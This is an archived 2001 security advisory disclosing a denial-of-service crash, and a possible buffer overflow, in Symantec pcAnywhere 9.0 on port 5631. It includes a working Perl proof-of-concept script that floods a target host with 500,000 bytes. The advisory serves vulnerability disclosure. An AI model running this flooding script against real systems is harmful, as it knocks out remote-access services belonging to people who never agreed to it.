Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Windows Net Apps :: sax14.txt

Symantec pcAnywhere 9.0 DoS / Buffer Overflow




=============================================================================
Securax-SA-14                                               Security Advisory
belgian.networking.security                                             Dutch
=============================================================================
Topic:          Symantec pcAnywhere 9.0 DoS / Buffer Overflow
Announced:      2001-02-08
Affects:        Symantec PcAnywhere 9.0 on Microsoft Windows 98 SE
=============================================================================



  Note: This  entire  advisory has been based upon trial and error results. We
        can not ensure the information  below is 100% correct being that we do
        not have any source code to audit.  This document is subject to change
        without prior notice.

        If you happen to find more information / problems concerning the below
        problem  or  further varients please contact me on the following email
        incubus@securax.net, or you can contact info@securax.org.


  I.  Problem Description
  -----------------------

  Symantec PcAnywhere is a program that  will allow others (who are authorised
  to have access :)) to use your pc. It's simular to a Windows NT 4.0 terminal
  server.

  PcAnywhere (when it's configured to 'be a host pc') listens on 2 ports, 5631
  (pcanywheredata, according to nmap) and 65301 (pcanywhere).  And when a user
  sends certain data in a particular way, pcAnywhere will crash.

  When a large amount  (it depends,  sometimes the host will go down with 320k
  characters, sometimes, you will have to send 500k bytes of data) are sent to
  a 'waiting' host on  the pcanywheredata port, "AWHOST32.EXE" will crash, and
  give an error on the screen, and write the "Unexpected program error"  to  a
  logfile. (with EAX, EBX, ... so read them, you'll find the yummy 0x61616161)

  Oh yeah, don't use uppercase characters, as PcAnywhere won't crash on them.

  Why no exploit, just a lame Denial of Service?

    1.) because I suck in win32 debugging / overflowing (but i'm reading)
        /* so if I can overflow win32 progs, i'll code an exploit */
    2.) as the amount of data is variable, it's hard to overflow..

  The DoS code:

  <--bof-->

   #!/usr/bin/perl

   # Symantec PcAnywhere 9.0 Denial of Service
   # -----------------------------------------
   #          by incubus <incubus@securax.net>
   #                       http://www.hexyn.be
   #
   #                    http://www.securax.net
   # All my love to Tessa.
   # Greetz to: f0bic, r00tdude, t0micron, senti, vorlon, cicero,
   #            Zym0tic, segfault, #securax@irc.hexyn.be
   # Thanks to jurgen swennen, for letting me (ab)use his computer.
   #
   # this is intended as proof of concept, do not abuse!

   use IO::Socket;
   $host = "$ARGV[0]";
   $port = 5631;
   if ($#ARGV<0) {
   print "use it like: $0 <hostname>\n";
   exit();
   }
   $socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>$host, 
PeerPort=>$port) || die "damn, ";
   print "hello\n";
   $buf = "";
   for($counter = 0; $counter < 500000; $counter++) {
           $buf .= "\x61";
   }
   print $socket "$buf\n";
   close($socket);
   exit();

  <--eof-->


  II. Impact
  ----------

  If someone exploits this, than Symantec is forced to rename the name of this
  product to PcAnyoneAnywhere or something...

  No, seriously, this could lead to a compromise of a system.


  III. possible workarounds
  -------------------------

  This advisory was also  sent to Symantec (info@symantec.com), we'll see what
  they do with it...

  IV credits
  ----------
  love to Tessa.
  greetz go out to : f0bic, r00t, Zym0t1c, vorlon, cicer0, tomicron, segfau|t,
                     and so many, many  others I forgot...


=============================================================================
For more information                                      incubus@securax.org
Website                                                http://www.securax.org
Advisories/Text                                   http://www.securax.org/pers
-----------------------------------------------------------------------------



TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH